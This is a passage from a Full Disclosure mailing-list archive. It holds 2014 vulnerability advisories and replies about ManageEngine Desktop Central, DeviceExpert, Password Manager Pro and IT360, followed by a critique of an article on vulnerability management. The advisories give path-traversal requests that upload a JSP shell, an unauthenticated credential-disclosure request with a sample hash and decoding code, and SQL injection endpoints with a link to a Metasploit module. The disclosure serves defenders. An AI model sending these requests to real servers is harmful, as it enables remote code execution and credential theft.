/statusUpdate?actionToCall=LFUcustomerId=1337fileName=../../../../../../shell.jspconfigDataID=1 ... your favourite jsp shell here ... b) CVE-2014-5006 Affected versions: all versions from v8 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp ... your favourite jsp shell here ... #2 CVE-2014-5007 Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) Constraints: no authentication needed; need to know valid computerName, domainName and customerId Affected versions: all versions from v7 to v9 build 90054 Fix: Upgrade to DC v9 build 90055 Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008 by Thomas Hibbert, and was fixed in 2013-11-09. The fix is incomplete and it is still possible to upload a shell with a valid computerName, domainName and customerId. POST /agentLogUploader?computerName=whatever1domainName=whatever2customerId=1337filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp ... your favourite jsp shell here ... ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert
Hi Keith,
Thanks for pointing this out.
I realised the advisory is not very clear - you are right, it is a base 64
encoded md5 hash. To get the actual hash you have to use the following Ruby
code:
Base64.decode64(password).unpack('H*')
The hash is a md5 of
admin12345678
Also ManageEngine have decided to fix the issue, and have now released
version 5.9 build 5981 that resolves this vulnerability.
I've updated the advisory at
https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
Regards
Pedro
On 28 Aug 2014 18:43, Keith I Myers keithiokepamy...@gmail.com wrote:
Are you sure that this is an MD5 Hash? It looks more like a base64 encoded
string (decoded value :N yZX@{ )
On Wed, Aug 27, 2014 at 5:50 PM, Pedro Ribeiro ped...@gmail.com wrote:
On 27 Aug 2014 19:14, Pedro Ribeiro ped...@gmail.com wrote:
Hi,
You can read the usernames and MD5 hashed passwords of all the users
in the Device Expert application by sending an unauthenticated
request.
I am releasing this as a 0 day as ManageEngine have responded that
they do not consider this a priority and won't fix it in the near
future unless a customer requests it. See details below.
User credential disclosure in ManageEngine DeviceExpert 5.9
Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Background on the affected product:
DeviceExpert is a web–based, multi vendor network change,
configuration and compliance management (NCCCM) solution for switches,
routers, firewalls and other network devices. Trusted by thousands of
network administrators around the world, DeviceExpert helps automate
and take total control of the entire life cycle of device
configuration management.
Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
build 5980 is vulnerable, older versions likely vulnerable
GET /ReadUsersFromMasterServlet
Example response:
?xml version=1.0
encoding=UTF-8?discoveryresultdiscoverydatausernameadmin/usernameuserroleAdministrator/userrolepasswordOk6/FqR5WtJY5UCLrnvjQQ==/passwordemailid
nore...@zohocorp.com
/emailidsaltvalue12345678/saltvalue/discoverydata/discoveryresult
The passwords are a salted MD5 hash.
A copy of this advisory is available at my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
Regards,
Pedro
To clarify, older versions are definitely vulnerable, I just don't know on
which versions the vulnerability initially appeared.
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
--
Keith Myers
Mobile : (305) 929-3475
EMail : keithiokepamy...@gmail.com
+Keith I Myers http://plus.kmyers.me
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] [The ManageOwnage Series, part I]: blind SQL injection in two servlets (metasploit module included)
On 19 Aug 2014 17:55, Pedro Ribeiro ped...@gmail.com wrote: TL;DR CVE-2014-3996 / CVE-2014-3997 Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions) Scroll to the bottom for the Metasploit module link; the module will be submitted to Metasploit proper in a pull request in the next few days. == Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions) Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Background on the affected products: Desktop Central is an integrated desktop mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises. Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration. These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients. Quoting the author of the Internet Census 2012: As a rule of thumb, if you believe that nobody would connect that to the Internet, really nobody, there are at least 1000 people who did. These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords. Technical details: The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time. #1 Vulnerability: Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360) CVE-2014-3996 Affected products / versions: - ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033 - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected. Constraints: - DC: no authentication or any other information needed - PMP: no authentication or any other information needed - IT360: valid user account needed Proof of concept: DC / PMP: GET /LinkViewFetchServlet.dat?sv=[SQLi] IT360: GET /console/LinkViewFetchServlet.dat?sv=[SQLi] #2 Vulnerability: Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) CVE-2014-3997 Affected products / versions: - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7003 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected. Constraints: - PMP: no authentication or any other information needed - IT360: valid user account needed Proof of concept: PMP: GET /MetadataServlet.dat?sv=[SQLi] IT360: GET /console/MetadataServlet.dat?sv=[SQLi] == A full text version of this advisory can be found in my repo: https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt A Metasploit module that exploits this vulnerability can also be found in my repo: https://raw.githubusercontent.com/pedrib/PoC/master/msf_modules/manageengine_dc_pmp_sqli.rb Regards, Pedro I realised the advisory is not explicit as to what the fixed versions are, so here it is: Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330 The advisory in my repo has also been updated: https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt
[FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert
Hi, You can read the usernames and MD5 hashed passwords of all the users in the Device Expert application by sending an unauthenticated request. I am releasing this as a 0 day as ManageEngine have responded that they do not consider this a priority and won't fix it in the near future unless a customer requests it. See details below. User credential disclosure in ManageEngine DeviceExpert 5.9 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Background on the affected product: DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Technical details: Vulnerability: User credential disclosure / CVE-2014-5377 Constraints: no authentication or any other information needed. Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable GET /ReadUsersFromMasterServlet Example response: ?xml version=1.0 encoding=UTF-8?discoveryresultdiscoverydatausernameadmin/usernameuserroleAdministrator/userrolepasswordOk6/FqR5WtJY5UCLrnvjQQ==/passwordemailidnore...@zohocorp.com/emailidsaltvalue12345678/saltvalue/discoverydata/discoveryresult The passwords are a salted MD5 hash. A copy of this advisory is available at my repo: https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt Regards, Pedro ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert
On 27 Aug 2014 19:14, Pedro Ribeiro ped...@gmail.com wrote: Hi, You can read the usernames and MD5 hashed passwords of all the users in the Device Expert application by sending an unauthenticated request. I am releasing this as a 0 day as ManageEngine have responded that they do not consider this a priority and won't fix it in the near future unless a customer requests it. See details below. User credential disclosure in ManageEngine DeviceExpert 5.9 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Background on the affected product: DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Technical details: Vulnerability: User credential disclosure / CVE-2014-5377 Constraints: no authentication or any other information needed. Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 build 5980 is vulnerable, older versions likely vulnerable GET /ReadUsersFromMasterServlet Example response: ?xml version=1.0 encoding=UTF-8?discoveryresultdiscoverydatausernameadmin/usernameuserroleAdministrator/userrolepasswordOk6/FqR5WtJY5UCLrnvjQQ==/passwordemailid nore...@zohocorp.com /emailidsaltvalue12345678/saltvalue/discoverydata/discoveryresult The passwords are a salted MD5 hash. A copy of this advisory is available at my repo: https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt Regards, Pedro To clarify, older versions are definitely vulnerable, I just don't know on which versions the vulnerability initially appeared. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] [The ManageOwnage Series, part I]: blind SQL injection in two servlets (metasploit module included)
TL;DR CVE-2014-3996 / CVE-2014-3997 Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions) Scroll to the bottom for the Metasploit module link; the module will be submitted to Metasploit proper in a pull request in the next few days. == Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions) Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Background on the affected products: Desktop Central is an integrated desktop mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises. Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration. These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients. Quoting the author of the Internet Census 2012: As a rule of thumb, if you believe that nobody would connect that to the Internet, really nobody, there are at least 1000 people who did. These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords. Technical details: The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time. #1 Vulnerability: Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360) CVE-2014-3996 Affected products / versions: - ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033 - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected. Constraints: - DC: no authentication or any other information needed - PMP: no authentication or any other information needed - IT360: valid user account needed Proof of concept: DC / PMP: GET /LinkViewFetchServlet.dat?sv=[SQLi] IT360: GET /console/LinkViewFetchServlet.dat?sv=[SQLi] #2 Vulnerability: Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) CVE-2014-3997 Affected products / versions: - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7003 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected. Constraints: - PMP: no authentication or any other information needed - IT360: valid user account needed Proof of concept: PMP: GET /MetadataServlet.dat?sv=[SQLi] IT360: GET /console/MetadataServlet.dat?sv=[SQLi] == A full text version of this advisory can be found in my repo: https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt A Metasploit module that exploits this vulnerability can also be found in my repo: https://raw.githubusercontent.com/pedrib/PoC/master/msf_modules/manageengine_dc_pmp_sqli.rb Regards, Pedro ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] So You Like Pain and Vulnerability Management? New Article.
On 12 May 2014 19:48, Pete Herzog li...@isecom.org wrote: Hi, I’m your friend and security researcher, Pete Herzog. You might know me from other public service announcements such as the widely anticipated, upcoming workshop Secrets of Security, and critic’s choice award winners: Teaching Your Teen to Hack Police Cars, and Help! My Monkey is Posting Pictures to Facebook! But I’m here today to take a moment and talk to you about the pain of neglect, isolation, abuse, and infection, better known as “vulnerability management”. In many ways vulnerability management can be part of a healthy system and over-all good security. But there’s many important differences between vulnerability management and security that you should know about: That's how my new article starts. 5 points on the pain of vulnerability management and how to make it hurt less. It's posted here: http://www.tripwire.com/state-of-security/vulnerability-management/so-you-like-pain-and-vulnerability-management/ Feel free to discuss with me on Twitter @peteherzog and #securitypain and #helpmymonkeyispostingpicturestofacebook ;) Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org Hi, I fail to see the point of the article and I think you are making some major assumptions here while at the same time stating the obvious. First, who is the audience of the article? As a vulnerability manager myself I find insulting that you think that I don't know that finding vulnerabilities by itself without ANY other security controls will make my employer secure. Secondly, you are saying that vulnerability management = scanning something with a vulnerability scanner, review the output and patch. As it says on Wikipedia, it is much more than that - it is the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities [¹]. So at the very least I would define it as identifying possible vulnerabilities with various tools - scanners, internal and external pentests, source code review, fuzzing, bug reports, etc - and managing their life cycle to the end by either patching, putting a control in place or even signing it off as an acceptable risk. Also you seem to focus solely on the problem of patching closed source software. But nowadays most of the attacks are done via the Web layer, and in most companies the Web layer is developed in house. So you can much more effectively find vulnerabilities with a source code review than just patching them as they appear. As the article seems to imply, vulnerability management is about reducing the risk and the overall attack surface. But I thought this was common knowledge, especially among people who consider themselves vulnerability managers? Regards Pedro [¹] http://en.m.wikipedia.org/wiki/Vulnerability_management ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
